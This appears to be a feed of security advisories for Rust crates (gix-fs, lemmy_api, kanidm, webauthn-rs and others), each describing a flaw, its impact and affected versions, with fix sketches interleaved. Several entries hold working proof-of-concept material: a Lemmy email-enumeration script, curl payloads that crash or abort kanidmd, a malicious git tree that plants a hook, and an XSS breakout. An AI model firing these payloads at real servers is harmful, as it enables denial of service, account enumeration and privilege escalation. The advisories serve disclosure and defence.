      at /home/paolobarbolini/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/iter/traits/iterator.rs:3676:9: 3676:23
   6: main
      at src/main.rs:14:18: 14:55

Uninitialized memory occurred at alloc844[0x21..0x22], in this allocation:
alloc844 (Rust heap, size: 48, align: 1) {
    0x00 │ e8 07 00 00 01 00 00 00 01 00 00 00 00 00 00 00 │ ................
    0x10 │ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │ ................
    0x20 │ 00 __ __ __ 01 00 00 00 00 00 00 00 __ __ __ __ │ .░░░........░░░░
}
```

### Impact

Soundness bug in safe API surface of `diesel-async`'s MySQL backend. Affects every user of `AsyncMysqlConnection` whose queries return a temporal column.

AI disclosure: this issue was found via Claude Code running Claude Opus 4.7.
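One fully safe way to produce a padding-free byte image, sketched with a stand-in struct rather than `MysqlTime`, is to serialise field-by-field into a zero-filled buffer using `core::mem::offset_of!` (stable since Rust 1.77); the padding bytes are then defined zeros rather than uninitialised memory:

```rust
use std::mem::{offset_of, size_of};

// Stand-in for a padded #[repr(C)] struct like MysqlTime.
#[repr(C)]
struct Demo {
    flag: bool, // padding bytes typically follow, before `value`
    value: u32,
}

// Serialise field-by-field into a zero-filled buffer: every padding byte
// is a defined zero, so reading the buffer is never undefined behavior.
fn to_bytes_zeroed(v: &Demo) -> Vec<u8> {
    let mut bytes = vec![0u8; size_of::<Demo>()];
    bytes[offset_of!(Demo, flag)] = v.flag as u8;
    let o = offset_of!(Demo, value);
    bytes[o..o + 4].copy_from_slice(&v.value.to_ne_bytes());
    bytes
}

fn main() {
    let bytes = to_bytes_zeroed(&Demo { flag: true, value: 7 });
    assert_eq!(bytes.len(), size_of::<Demo>());
    assert_eq!(bytes[offset_of!(Demo, flag)], 1);
    // The bytes between the fields (the padding) are defined zeros.
    assert!(bytes[1..offset_of!(Demo, value)].iter().all(|&b| b == 0));
}
```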

Affected versions

All versions < 0.9.0

CVSS Vector

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N/E:P

High
📦 gix-fs 📌 All versions < 0.21.1 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Local ⚪ Not exploited 🟢 Patched
💬 ### Summary A malicious tree can be constructed that will, when checked out with gitoxide, permit writing an attacker-controlled symlink into any existing directory the user has write access to. ### Details During checkout, all symlink index entries are deferred and created af...
📅 2026-05-07 OSV/crates.io 🔗 Details

Full description

### Summary

A malicious tree can be constructed that will, when checked out with gitoxide, permit writing an attacker-controlled symlink into any existing directory the user has write access to.

### Details

During checkout, all symlink index entries are deferred and created after regular files using a single shared `gix_worktree::Stack`. Internally, this uses a `gix_fs::Stack`. `gix_fs::Stack::make_relative_path_current()` caches validated path prefixes: when the previously-processed leaf component exactly matches the leading component(s) of the next path, the leaf-to-directory transition at `gix-fs/src/stack.rs:195-197` invokes only `delegate.push_directory()`, never `delegate.push()`. In `gix_worktree::stack::delegate::StackDelegate`, when the state member is `State::CreateDirectoryAndAttributesStack`, `Attributes::push_directory()` only loads attributes (from the ODB, in the clone case), and does not perform any other checks. The on-disk `symlink_metadata()` check and unlink-on-collision live in `StackDelegate::push()`'s invocation of `create_leading_directory()`, which is therefore bypassed for the cached prefix. The final symlink is created with plain `std::os::unix::fs::symlink`, which follows symlinks in parent directories. Therefore, it's possible to provide a tree with duplicate symlink and directory entries that exploits this.

If a tree is constructed with:

1. A `120000` (symlink) entry `a` that points to `.git/hooks`.
2. A `040000` (directory) entry `a` with a subtree that contains a symlink from `post-checkout` to `../../payload`.
3. A `100755` (executable file) entry `payload`.

This is converted by `gix_index::State::from_tree()` into index entries `["a" (SYMLINK), "a/post-checkout" (SYMLINK)]`. Then, during the delayed symlink phase:

1. `a` is created as a symlink to e.g. `.git/hooks`.
2. When processing `a/post-checkout`, the `a` prefix is reused from the just-processed leaf entry without re-running the intermediate-directory check, after which…
3. `symlink(target, "<wt>/a/post-checkout")` resolves through the just-created symlink to write `.git/hooks/post-checkout`.

Although this example uses `.git/hooks` for simplicity, there's no actual requirement to write within the repo checkout. This can be fairly easily chained into code execution by writing to something that is known to be executed — for example, by writing to `.git/hooks/post-checkout` if the attacker knows that a hook-aware Git implementation will be used later, or by writing to something like `~/.local/bin`.

### PoC

Attached is [build-bad-repo.sh](https://github.com/user-attachments/files/27223800/build-bad-repo.sh), which builds a repo with the aforementioned tree structure. Cloning it with `gix` will set up the malicious `.git/hooks/post-checkout`, at which point anything that normally invokes the `post-checkout` hook will result in its execution, such as `git checkout -b new-branch`.

### Impact

Arbitrary symlink creation into any existing directory the user can write to.

### Disclosure

This vulnerability was found by AI (specifically, Claude Mythos) as part of [Project Glasswing](https://www.anthropic.com/glasswing). This advisory was written and verified by a human.

Affected versions

All versions < 0.21.1

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Unspecified
📦 lemmy_api 📌 All versions 📧 Mail 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited
💬 ## Summary The unauthenticated resend-verification endpoint returns different responses for registered and unregistered email addresses. A malicious third party can submit candidate addresses to `/api/v4/account/auth/resend_verification_email` and distinguish accounts from misse...
📅 2026-05-06 OSV/crates.io 🔗 Details

Full description

## Summary

The unauthenticated resend-verification endpoint returns different responses for registered and unregistered email addresses. A malicious third party can submit candidate addresses to `/api/v4/account/auth/resend_verification_email` and distinguish accounts from misses.

## Details

`resend_verification_email()` looks up the submitted address and returns the lookup error to the caller:

```rust
let local_user_view = LocalUserView::find_by_email(&mut context.pool(), &email).await?;
check_local_user_valid(&local_user_view)?;
```

The password reset endpoint already uses a safer pattern. It discards lookup errors and returns success, which prevents the same account-discovery channel.

## Proof of Concept

The following script creates one user and probes that address plus a missing address.

```python
import requests, random, string

BASE = "http://127.0.0.1:8536/api/v4"  # change to the target Lemmy URL
ADMIN_USER = "lemmy"
ADMIN_PASS = "lemmylemmy"
PASSWORD = "Password123456!"

def post(path, **body):
    return requests.post(BASE + path, json=body)

suffix = "enum" + "".join(random.choice(string.ascii_lowercase) for _ in range(6))
admin = post("/account/auth/login", username_or_email=ADMIN_USER, password=ADMIN_PASS).json()["jwt"]
requests.put(BASE + "/site", headers={"Authorization": "Bearer " + admin},
             json={"registration_mode": "open", "email_verification_required": False})
email = "alice" + suffix + "@example.test"
post("/account/auth/register", username="alice" + suffix, password=PASSWORD,
     password_verify=PASSWORD, email=email).raise_for_status()
for candidate in [email, "missing" + suffix + "@example.test"]:
    r = post("/account/auth/resend_verification_email", email=candidate)
    print(candidate, "HTTP", r.status_code, r.text[:300])
```

Output:

```text
alicepoceudtpf@example.test HTTP 200 {"success":true}
missingpoceudtpf@example.test HTTP 404 {"error":"not_found","cause":"Record not found"}
```

## Impact

A malicious third party can enumerate registered email addresses without authentication. The endpoint uses the registration rate limit bucket, not an endpoint-specific anti-enumeration limit, so the attacker can automate probes across candidate address lists. The response also distinguishes missing accounts from banned or deleted accounts because `check_local_user_valid()` returns separate error types.

## Recommended Fix

Use the password-reset pattern for resend verification. Move the lookup and email-send work into a helper, ignore helper errors in the handler, and always return `{"success": true}` for syntactically valid input.

---

*Found by [aisafe.io](https://aisafe.io)*
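The recommended fix can be sketched in Rust with invented names (the real handler is async and database-backed): run the lookup-and-send work in a helper and collapse every outcome to the same success response:

```rust
#[derive(Debug, PartialEq)]
struct Success {
    success: bool,
}

// Helper: does the lookup and (if the account exists) the email send.
// Its error is an internal detail that must not reach the response.
fn send_verification_email(email: &str, registered: &[&str]) -> Result<(), &'static str> {
    if registered.contains(&email) {
        // ... enqueue the verification email here ...
        Ok(())
    } else {
        Err("not_found")
    }
}

// Handler: deliberately discard the helper's result so hits and misses
// produce identical responses.
fn resend_verification_handler(email: &str, registered: &[&str]) -> Success {
    let _ = send_verification_email(email, registered);
    Success { success: true }
}

fn main() {
    let db = ["alice@example.test"];
    let hit = resend_verification_handler("alice@example.test", &db);
    let miss = resend_verification_handler("missing@example.test", &db);
    assert_eq!(hit, miss); // indistinguishable to the caller
}
```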

Affected versions

All versions (no patched release listed)

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

High
📦 ldap3_proto 📌 All versions < 0.7.1 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Impact LDAP queries are not validated for depth, which can cause the parser (both PEG and ASN) to exhaust the stack. This *may* cause a denial of service in applications that process queries. ### Workarounds N/A ### Resources Related to GHSA-r5fr-9gmv-jggh
📅 2026-05-06 OSV/crates.io 🔗 Details

Full description

### Impact

LDAP queries are not validated for depth, which can cause the parser (both PEG and ASN) to exhaust the stack. This *may* cause a denial of service in applications that process queries.

### Workarounds

N/A

### Resources

Related to GHSA-r5fr-9gmv-jggh
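A standard mitigation for this class, shown here on a toy grammar of nested parentheses rather than real LDAP filters, is to thread a depth counter through the recursion and fail cleanly once a limit is exceeded:

```rust
// Illustrative depth limit; a real parser would tune this to its grammar.
const MAX_DEPTH: usize = 64;

/// Parse balanced nested parentheses, returning how many bytes were
/// consumed, and bail out before the recursion can exhaust the stack.
fn parse_nested(input: &[u8], depth: usize) -> Result<usize, &'static str> {
    if depth > MAX_DEPTH {
        return Err("filter nesting too deep");
    }
    match input.first() {
        Some(b'(') => {
            let consumed = parse_nested(&input[1..], depth + 1)?;
            match input.get(1 + consumed) {
                Some(b')') => Ok(consumed + 2),
                _ => Err("unbalanced parenthesis"),
            }
        }
        _ => Ok(0), // empty input / leaf
    }
}

fn main() {
    assert!(parse_nested(b"((()))", 0).is_ok());
    // 100,000 nested opens: bounded error instead of a stack overflow.
    let hostile = vec![b'('; 100_000];
    assert!(parse_nested(&hostile, 0).is_err());
}
```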

Affected versions

All versions < 0.7.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Unspecified
📦 kanidmd_lib 📌 All versions < 1.9.3 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary The `POST /v1/domain/_image` and `POST /v1/oauth2/{rs_name}/_image` handlers call `validate_image()` on the uploaded body **before** the ACL check that restricts image upload to admins. Any bug in an image validator is therefore reachable by an unauthenticated remote ...
📅 2026-05-06 OSV/crates.io 🔗 Details

Full description

### Summary

The `POST /v1/domain/_image` and `POST /v1/oauth2/{rs_name}/_image` handlers call `validate_image()` on the uploaded body **before** the ACL check that restricts image upload to admins. Any bug in an image validator is therefore reachable by an unauthenticated remote client rather than being admin-gated. One such bug exists today: `png_has_trailer()` panics on inputs shorter than 8 bytes, or whose first chunk-length field is near `u32::MAX`.

**On a default build this has no server-wide impact.** The panic unwinds only the requester's own tokio task; the server process survives, no shared state is poisoned, and other connections are unaffected. This was reported privately rather than as a public issue because (a) the project previously treated an admin-triggered thread crash of identical impact as security-relevant (e51d0dee4), and this is reachable by a broader population; and (b) a downstream build with `panic = "abort"` would upgrade it to an unauthenticated process-crash DoS.

### Details

#### Validate-before-authorize ordering

Both handlers parse and validate attacker-controlled bytes before checking whether the caller is permitted to upload at all:

- `server/core/src/https/v1_domain.rs:118` — `image.validate_image()` runs; `handle_image_update(client_auth_info, …)` (the ACL check) is at line 129.
- `server/core/src/https/v1_oauth2.rs:550` — same ordering.

The `VerifiedClientInformation` extractor (`server/core/src/https/extractors/mod.rs:18-90`) always returns `Ok` — it builds a `ClientAuthInfo` from whatever credentials are present (including none) and does not reject anonymous callers. Authorization is deferred to `handle_image_update()`, which is never reached if the validator panics or errors first.

#### PNG validator panic (demonstrator)

`validate_image()` (`server/lib/src/valueset/image/mod.rs:98`) checks only a 256 KiB maximum size, not a minimum, before dispatching to the format-specific validator.

**Short input** — `server/lib/src/valueset/image/png.rs:73-76`:

```rust
pub fn png_has_trailer(contents: &Vec<u8>) -> Result<bool, ImageValidationError> {
    let buf = contents.as_slice();
    let (magic, buf) = buf.split_at(PNG_PRELUDE.len()); // 8; panics if len < 8
```

**Chunk-length overflow** — `server/lib/src/valueset/image/png.rs:46,53`:

```rust
if buf.len() < (length + 4) as usize { // length: u32; wraps before the usize cast
    ...
}
let (_, buf) = buf.split_at(length as usize); // panics for length ≈ u32::MAX
```

In a release build `0xFFFF_FFFC + 4` wraps to `0`, the guard passes, and `split_at` panics.

### PoC

```sh
printf '\x89PNG' > /tmp/short.png
curl -sk https://$KANIDM_HOST/v1/domain/_image \
  -F 'image=@/tmp/short.png;type=image/png;filename=x.png'
# → connection reset / empty reply; server process remains up
```

Unit-test confirmation (`cargo test -p kanidmd_lib --lib`):

```rust
#[test]
fn audit_png_short_input_panics() {
    let short = vec![0x89u8, 0x50, 0x4e, 0x47];
    assert!(std::panic::catch_unwind(|| png_has_trailer(&short)).is_err());
}

#[test]
fn audit_png_chunk_length_overflow_panics() {
    let mut data = vec![0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a];
    data.extend_from_slice(&[0xFF, 0xFF, 0xFF, 0xFD]);
    data.extend_from_slice(b"IHDR");
    data.extend_from_slice(&[0u8; 8]);
    assert!(std::panic::catch_unwind(|| png_has_trailer(&data)).is_err());
}
```

Both tests pass (i.e. both inputs panic).

### Impact

The only party affected is the requester, whose own connection is dropped. Repeating the request has no cumulative effect beyond ordinary request load. On the upstream build:

- Each connection runs in its own `tokio::task::spawn` (`server/core/src/https/mod.rs:481`); the accept loop continues after a task panic.
- No `panic = "abort"` in any workspace `[profile.*]`.
- No `Mutex`/`RwLock` held across the call site; nothing is poisoned.
- The panic occurs before any write actor is messaged; no DB or replication state is touched.

**Residual risk:** a downstream packager that sets `panic = "abort"` (or links code that installs an abort handler) would see a full unauthenticated process crash. (No such packager is known.)

**Affected:** v1.1.0-rc.15 (introduced in e7f594a1c, #2112) through `master` @ edf50b9da.
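A panic-free shape for the two failing cases, modelled on the advisory's excerpts (the constant and signature here are illustrative, not kanidm's actual code): guard the prelude split with `get`, and widen the chunk length to `u64` before any addition:

```rust
const PNG_PRELUDE: [u8; 8] = [0x89, b'P', b'N', b'G', 0x0d, 0x0a, 0x1a, 0x0a];

/// Illustrative panic-free check of the prelude and first chunk header.
fn check_png_start(contents: &[u8]) -> Result<(), &'static str> {
    // Short input: a bare `split_at(8)` would panic; `get` cannot.
    let magic = contents
        .get(..PNG_PRELUDE.len())
        .ok_or("input shorter than PNG prelude")?;
    if magic != &PNG_PRELUDE[..] {
        return Err("bad PNG magic");
    }
    let rest = &contents[PNG_PRELUDE.len()..];
    let len_bytes: [u8; 4] = match rest.get(..4).and_then(|s| s.try_into().ok()) {
        Some(b) => b,
        None => return Err("missing chunk length"),
    };
    let length = u32::from_be_bytes(len_bytes);
    // Overflow: widen to u64 before adding, instead of computing
    // `length + 4` in u32, which wraps for length near u32::MAX.
    let needed = 4u64 + length as u64 + 4; // chunk type + data + CRC
    if (rest.len() as u64).saturating_sub(4) < needed {
        return Err("truncated chunk");
    }
    Ok(())
}

fn main() {
    // The advisory's two panic triggers now return errors instead:
    assert!(check_png_start(&[0x89, b'P', b'N', b'G']).is_err());
    let mut evil = PNG_PRELUDE.to_vec();
    evil.extend_from_slice(&[0xFF, 0xFF, 0xFF, 0xFD]); // length near u32::MAX
    evil.extend_from_slice(b"IHDR");
    assert!(check_png_start(&evil).is_err());
}
```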

Affected versions

All versions < 1.9.3

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L

High
📦 scim_proto 📌 All versions < 1.9.3 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
💬 ### Summary A single unauthenticated `GET` to any `/scim/v1/...` endpoint with a `?filter=` query string of a few thousand nested parentheses (≈ 4–12 KB) drives the recursive-descent PEG parser past the worker thread's stack guard page. Rust responds to stack overflow with `std:...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary

A single unauthenticated `GET` to any `/scim/v1/...` endpoint with a `?filter=` query string of a few thousand nested parentheses (≈ 4–12 KB) drives the recursive-descent PEG parser past the worker thread's stack guard page. Rust responds to stack overflow with `std::process::abort()` — the entire `kanidmd` process exits. The parse runs inside axum's `Query<ScimEntryGetQuery>` extractor, before any handler body and therefore before any ACL check.

### Details

The SCIM filter grammar recurses on `(` and `not (` with no depth bound.

**`proto/src/scim_v1/mod.rs:263-433`** — `peg::parser! { grammar scimfilter() ... }`:

```rust
// line 281
"not" separator()+ "(" e:parse() ")" { ScimFilter::Not(Box::new(e)) }
// line 293
"(" e:parse() ")" { e }
```

Both rules re-enter `parse()` without a depth counter.

**`proto/src/scim_v1/mod.rs:442-447`** — `impl FromStr for ScimFilter` calls `scimfilter::parse(input)` directly on the raw string with no length or depth pre-check.

**`proto/src/scim_v1/mod.rs:80-81`** — `ScimEntryGetQuery.filter` is `#[serde_as(as = "Option<DisplayFromStr>")]`, so deserialising the query struct invokes `ScimFilter::from_str` on attacker bytes.

**Unauthenticated reachability** — nine handlers in `server/core/src/https/v1_scim.rs` (route table at lines 865-1029) take `Query<ScimEntryGetQuery>` as an argument: `/scim/v1/Entry`, `/scim/v1/Entry/{id}`, `/scim/v1/Person/{id}`, `/scim/v1/Application`, `/scim/v1/Application/{id}`, `/scim/v1/Class`, `/scim/v1/Attribute`, `/scim/v1/Message`, `/scim/v1/Message/{id}`. The SCIM router is merged unconditionally for every server role (`server/core/src/https/mod.rs:312`). Axum extracts handler arguments before the handler body runs. The preceding `VerifiedClientInformation` extractor (`server/core/src/https/extractors/mod.rs:16-91`) always returns `Ok` (line 89) regardless of credentials; authorization is deferred to the handler body, which is never reached.

The existing semantic depth limit (`DEFAULT_LIMIT_FILTER_DEPTH_MAX = 12`, `server/lib/src/constants/mod.rs:212`) is enforced in `Filter::from_scim_ro` (`server/lib/src/filter.rs:786`) **after** the PEG parse has already produced an AST, so it cannot prevent the parser itself from blowing the stack. The production daemon (`server/daemon/src/main.rs:735-744`) uses `new_multi_thread()` with default 2 MiB worker stacks; hyper's `max_buf_size` (~400 KiB) is not lowered (`server/core/src/https/mod.rs:708-727`), so a 12 KB URI is accepted.

An identical unbounded grammar exists in `libs/scim_proto/src/filter.rs:112-276` (not network-reachable, but should be fixed in the same patch).

### PoC

```sh
curl -sk "https://idm.example.com/scim/v1/Application?filter=$(python3 -c 'print("("*3000+"a+pr"+")"*3000)')"
# → curl: (52) Empty reply from server
# → server journal: "fatal runtime error: stack overflow, aborting", SIGABRT
```

Release-build threshold measured at ~2 000 nesting levels / ~4 KB:

```
$ cargo test --release -p kanidm_proto --test scim_filter_depth -- --nocapture
parens depth=1500 len=3004 -> survived
parens depth=2000 len=4004
thread 'audit_scim_filter_nested_parens' has overflowed its stack
fatal runtime error: stack overflow, aborting
(signal: 6, SIGABRT: process abort signal)
```

End-to-end against an in-process server via `kanidmd_testkit` (no authentication performed):

```
Testkit server setup complete - http://localhost:18080/
audit_scim_dos: sending unauthenticated GET, url len = 12056
thread '...' has overflowed its stack
fatal runtime error: stack overflow, aborting
(signal: 6, SIGABRT: process abort signal)
```

### Impact

Process-wide availability loss; no confidentiality or integrity impact.

- **Unauthenticated**, default install, no feature flag required.
- **Process abort, not task panic.** Stack overflow triggers libstd's guard-page handler, which calls `std::process::abort()`. tokio's per-task `catch_unwind` isolation does not apply to aborts. All in-flight HTTP requests, OAuth2/OIDC sessions, LDAP binds, and the web UI are terminated.
- **Repeatable.** One ~12 KB GET per crash; a `while true; do curl ...; done` loop holds the service down indefinitely across supervisor restarts.
- The 6 011-byte variant (`depth=3000`) fits under the nginx default `large_client_header_buffers` limit of 8 KB, so a typical reverse proxy does not mitigate.

**Affected**: v1.7.0 through `master` @ edf50b9da.
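One cheap mitigation is a linear pre-parse depth scan that rejects deeply nested filters before the PEG parser ever recurses. A minimal sketch, reusing the advisory's semantic limit of 12 (the function name is hypothetical; the actual fix may instead bound recursion inside the grammar):

```rust
// Hedged sketch: reject a SCIM filter string whose parenthesis nesting exceeds
// `max` before handing it to the recursive-descent parser. O(n), no recursion,
// so it cannot itself blow the stack.
fn nesting_within_limit(input: &str, max: usize) -> bool {
    let mut depth: usize = 0;
    for c in input.chars() {
        match c {
            '(' => {
                depth += 1;
                if depth > max {
                    return false;
                }
            }
            ')' => depth = depth.saturating_sub(1),
            _ => {}
        }
    }
    true
}

fn main() {
    // The PoC payload: thousands of nested parens.
    let attack = format!("{}a pr{}", "(".repeat(3000), ")".repeat(3000));
    assert!(!nesting_within_limit(&attack, 12));
    // A legitimate filter stays well under the limit.
    assert!(nesting_within_limit("not (userName eq \"bjensen\")", 12));
    println!("depth guard ok");
}
```

Running such a check inside `ScimFilter::from_str`, before `scimfilter::parse(input)`, would close the pre-authentication path described above.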

Affected versions

All versions < 1.9.3

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Low
📦 kanidm 📌 All versions < 1.9.3 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
📅 2026-05-06 OSV/crates.io 🔗 Details

Full description

### Summary

The kanidmd OAuth2 token-exchange (`/oauth2/token`) and token-introspection (`/oauth2/token/introspect`) endpoints compare the supplied `client_secret` against the stored secret using Rust's `PartialEq` on `String`, which short-circuits on the first mismatching byte. This produces an observable timing discrepancy that varies with the length of the matching prefix.

### Details

- https://github.com/kanidm/kanidm/blob/master/server/lib/src/idm/oauth2.rs#L1135 — variable-time comparison in `check_oauth2_token_exchange`
- https://cwe.mitre.org/data/definitions/208.html — CWE-208: Observable Timing Discrepancy

### PoC

Static analysis only — no timing-recovery script was run because remote recovery of a 48-byte high-entropy secret over HTTPS is not practically demonstrable. The variable-time behaviour is established by inspection:

```rust
// server/lib/src/idm/oauth2.rs:1135 (check_oauth2_token_exchange)
if authz_secret == &secret {
    …
} else {
    return Err(Oauth2Error::AuthenticationRequired);
}
```

`String: PartialEq` delegates to `<[u8] as PartialEq>::eq`, which checks length equality, then iterates byte-by-byte and returns on the first difference.

### Impact

An unauthenticated network attacker who can reach the OAuth2 endpoints can submit arbitrary `client_id`/`client_secret` pairs and observe response latency. In principle the early-exit comparison leaks the position of the first mismatching byte, providing a timing oracle toward incremental recovery of a confidential client's secret. In practice the stored secret is a server-generated 48-character high-entropy string, the comparison runs inside an async tokio handler behind TLS, and network jitter is orders of magnitude larger than a single byte-compare — so remote recovery is not considered realistic with current techniques. This is a hardening issue rather than a practically exploitable vulnerability.

### Affected versions

All published `kanidmd_lib` releases; the comparison is still variable-time on `master` at 1.10.0-dev.
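The standard remedy is a constant-time comparison. Production code would typically use a vetted primitive such as the `subtle` crate's `ConstantTimeEq`, but the idea can be sketched in plain Rust (names hypothetical):

```rust
// Hedged sketch: compare two byte strings without an early exit. The XOR of
// every byte pair is OR-accumulated, so the loop's duration depends only on
// the input length, not on where the first mismatch occurs. (A real fix
// should use subtle::ConstantTimeEq, which also guards against compiler
// optimisations re-introducing a branch.)
fn ct_eq(a: &[u8], b: &[u8]) -> bool {
    if a.len() != b.len() {
        // Length is not secret here: stored client secrets have a fixed size.
        return false;
    }
    let mut diff = 0u8;
    for (x, y) in a.iter().zip(b.iter()) {
        diff |= x ^ y;
    }
    diff == 0
}

fn main() {
    assert!(ct_eq(b"secret-48-bytes", b"secret-48-bytes"));
    assert!(!ct_eq(b"secret-48-bytes", b"Xecret-48-bytes"));
    assert!(!ct_eq(b"short", b"longer"));
    println!("ct compare ok");
}
```

Swapping `authz_secret == &secret` for such a comparison removes the prefix-length oracle at negligible cost.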

Affected versions

All versions < 1.9.3

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Unspecified
📦 kanidm 📌 All versions < 1.9.3 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
📅 2026-05-06 OSV/crates.io 🔗 Details

Full description

### Summary

The kanidmd web UI renders the WebAuthn passkey-registration challenge as raw JSON inside an inline `<script id="data">` element using the Askama `|safe` filter. The challenge embeds the account's `displayname`, which `serde_json` serialises without escaping `<`/`>`. A `displayname` containing `</script>` therefore terminates the script element early and injects arbitrary HTML into the credential-update page. Because the page is htmx-driven and the server's CSP allows `'unsafe-eval'`, injected `hx-*` attributes can issue authenticated same-origin API requests with the viewer's bearer cookie.

### Impact

An authenticated attacker who is a member of `idm_people_admins` can write the `displayname` of any `Person` entry — including high-privilege persons — because `idm_acp_people_pii_manage` carries no high-privilege exclusion filter. When the targeted high-privilege user later opens **Add Passkey** on their own credential-update page (`/ui/reset`), the injected markup is swapped into the DOM and htmx fires attacker-chosen same-origin requests authenticated as the victim. This allows a helpdesk-tier operator to escalate to `idm_admins` (e.g. by POSTing themselves into the group) or otherwise act with the victim's session. The self-write path (`idm_people_self_name_write`) is self-XSS only and is not counted toward impact. Even without the htmx vector, the breakout permits `<meta http-equiv='refresh'>` open-redirect and arbitrary defacement of the credential page.

### Details

- https://github.com/kanidm/kanidm/blob/master/server/core/templates/credential_update_add_passkey_partial.html#L3 — the `|safe` sink
- https://github.com/kanidm/kanidm/blob/master/server/core/src/https/views/reset.rs#L506-L509 — `serde_json::to_string` of the challenge
- https://github.com/kanidm/kanidm/blob/master/server/lib/src/idm/credupdatesession.rs#L2453-L2460 — `displayname` flows into `start_passkey_registration`

### Affected versions

All releases shipping the htmx credential-update views.
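A common hardening for JSON embedded in an inline `<script>` element is to escape the breakout characters with JSON `\uXXXX` sequences before marking the string `|safe`. A minimal sketch of that escaping (the helper name is hypothetical, not kanidm's actual fix):

```rust
// Hedged sketch: make a serialised JSON string safe to inline inside a
// <script> element by replacing the characters that can terminate the element
// with JSON \uXXXX escapes. The escaped form decodes to the identical string
// when the page parses the JSON.
fn escape_json_for_script(json: &str) -> String {
    json.replace('<', "\\u003c")
        .replace('>', "\\u003e")
        .replace('&', "\\u0026")
}

fn main() {
    let payload = r#"{"displayname":"</script><img src=x onerror=alert(1)>"}"#;
    let escaped = escape_json_for_script(payload);
    // The literal "</script>" sequence no longer appears, so the element
    // cannot be terminated early by a hostile displayname.
    assert!(!escaped.contains("</script>"));
    assert!(escaped.contains("\\u003c/script\\u003e"));
    println!("{escaped}");
}
```

Several serialisers offer this behaviour natively (e.g. `serde_json`'s output fed through such a filter); the key property is that the escaping happens after serialisation and before template insertion.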

Affected versions

All versions < 1.9.3

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N

Low
📦 webauthn-rs-core 📌 All versions < 0.5.5 ⛓️‍💥 Supply-chain attack 🦀 Rust library crates.io 🎯 Remote ⚪ Not exploited 🟢 Patched
📅 2026-05-06 OSV/crates.io 🔗 Details

Full description

### Summary

`webauthn-rs-core` ([Relying Party][rp]) and `webauthn-authenticator-rs` ([client][]) checked that [an `Origin` in `CollectedClientData`][origin] is valid for [an RP ID][rpid] with [`str::ends_with()`][ends-with], [without checking for a dot (`.`) before the RP ID when allowing subdomains][registerable-suffix]. This check is flawed, and could allow requests from an attacker-controlled domain such as `hermit-crab.example` to be accepted for the RP ID `crab.example` (assuming `.example` were a publicly-registerable TLD) when the RP allows authenticating from a subdomain (disabled by default in `webauthn-rs-core` and `webauthn-rs`).

[registerable-suffix]: https://html.spec.whatwg.org/multipage/browsers.html#is-a-registrable-domain-suffix-of-or-is-equal-to
[ends-with]: https://doc.rust-lang.org/stable/std/primitive.str.html#method.ends_with
[client]: https://www.w3.org/TR/webauthn-3/#client
[rp]: https://www.w3.org/TR/webauthn-3/#relying-party
[rpid]: https://www.w3.org/TR/webauthn-3/#rp-id
[origin]: https://www.w3.org/TR/webauthn-3/#dom-collectedclientdata-origin

* In `webauthn-rs-core`, this **only** applies when:
  * [`WebauthnCore::allow_subdomains_origin`](https://docs.rs/webauthn-rs-core/0.5.4/webauthn_rs_core/struct.WebauthnCore.html#method.new_unsafe_experts_only) is `true` (the default is `false`), *and*
  * the attacker could register a domain that ends with the RP ID as a raw string, *and*
  * the client does not implement these checks correctly either.

`webauthn-rs` can set `allow_subdomains_origin` via [`WebauthnBuilder::allow_subdomains`](https://docs.rs/webauthn-rs/0.5.4/webauthn_rs/struct.WebauthnBuilder.html#method.allow_subdomains). Fixing the bug in `webauthn-rs-core` also fixes it in `webauthn-rs`.
* In `webauthn-authenticator-rs`, the flawed check is in [`WebauthnAuthenticator::do_registration()`](https://docs.rs/webauthn-authenticator-rs/0.5.4/webauthn_authenticator_rs/struct.WebauthnAuthenticator.html#method.do_registration) and [`do_authentication()`](https://docs.rs/webauthn-authenticator-rs/0.5.4/webauthn_authenticator_rs/struct.WebauthnAuthenticator.html#method.do_registration). A conforming [Relying Party][rp] implementation would reject such requests, but `webauthn-rs-core` did not. An application can still provide an incorrect `origin` parameter to `webauthn-authenticator-rs`, or use lower-level APIs that bypass these checks entirely, and this is by design.

These issues are a violation of [WebAuthn Level 3 §13.4.9](https://www.w3.org/TR/webauthn-3/#sctn-validating-origin), [§5.1.3 Step 8](https://www.w3.org/TR/webauthn-3/#CreateCred-DetermineRpId) and [§5.1.4.1 Step 7](https://www.w3.org/TR/webauthn-3/#GetAssn-DetermineRpId).

### Details

* `webauthn-rs-core/src/core.rs` line 1213: https://github.com/kanidm/webauthn-rs/blob/197cddf8487a2dbdd5d374e50d80aa1e4682f3ab/webauthn-rs-core/src/core.rs#L1211-L1216
